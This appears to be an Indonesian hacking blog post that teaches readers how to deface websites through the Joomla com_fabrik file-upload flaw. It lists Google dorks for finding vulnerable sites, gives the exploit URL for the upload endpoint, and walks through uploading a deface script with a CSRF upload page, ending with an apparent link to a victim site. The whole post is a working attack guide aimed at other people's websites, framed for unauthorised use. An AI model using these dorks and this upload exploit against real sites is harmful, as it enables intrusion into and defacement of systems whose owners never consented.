*_Selamat Pagi_*
Pada postingan kita kali ini saya akan membahas cara deface metode com_fabrik, Saya yakin pasti di antara kalian sudah pernah mendengar metode ini kan, ya maklum saja memang metode ini sudah cukup lama sekali ada. Oke langsung saja kita menuju tutorialnya.
Bahan:
~ Dork:
- inurl:index.php?option=com_fabrik
- inurl:option=com_fabrik&format=raw
- com_fabrik site:
- inurl:index.php/component/fabrik/ site:
- inurl:index.php?option=com_fabrik&view= site:
- inurl:viewTable?cid= site:com
- /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
- Bisa kalian download disini [CSRF] COM_FABRIK MR.MaZe404
Jika semua bahan - bahannya udah ada langsung aja kita mulai tutorilanya.
- Pertama kalian dorking dengan dork di atas
- Setelah kalian mendorking lalu kalian pilih web target kalian dan masukkan exploit ini http://site.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload atau kalian bisa liat exploitnya di atas
- jika webnya vuln maka tampilannya akan seperti ini
- Lalu Copy - Paste link website target kalian ke CSRF kalian, seperti di bawah ini
- Jika sudah, kalian save dan buka di browser kalian seperti ini
- Lalu klik "Browse..." dan cari script deface kalian, jika sudah dipilih lalu klik tombol "sikat!!" jika berhasil maka tampilannya seperti di bawah ini
- Untuk melihat hasil deface kalian http://site.com/scriptdeface.html
 |
| http://www.zambianacmisonline.org/single.html |
0 komentar